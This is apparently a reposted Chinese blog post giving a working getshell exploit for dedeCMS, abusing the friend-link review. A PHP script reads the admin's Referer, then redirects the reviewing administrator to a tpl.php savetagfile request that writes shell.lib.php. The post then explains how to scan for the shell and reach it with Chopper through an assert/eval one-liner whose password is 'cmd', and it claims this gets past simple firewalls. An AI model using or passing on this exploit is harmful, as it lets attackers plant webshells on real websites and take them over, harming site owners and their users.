过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用
1.php
//print_r($_SERVER);
$referer?=?$_SERVER['HTTP_REFERER'];
$dede_login?=?str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后臺的路徑
//拼接?exp
$muma?=?''.'';
$exp?=?'tpl.php?action=savetagfile&actiondo=addnewtag&content='.?$muma?.'&filename=shell.lib.php';
$url?=?$dede_login.$exp;
//echo?$url;
header("location:?".$url);
//?send?mail?coder
exit();
?>
把1.php上傳到你的空間域名
站長審核后臺友情連接 ?后生成一句話地址為http://hack1990.com//include/taglib/shell.lib.php
御劍字典添加/include/taglib/shell.lib.php測試是否存活即可
最后菜刀訪問傳參一句話http://hack1990.com//include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密碼為cmd
過簡單防火墻
總結
以上是生活随笔為你收集整理的过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: php 继承内核中的基类,继承类上的PH
- 下一篇: 花呗交易分期费用是多少?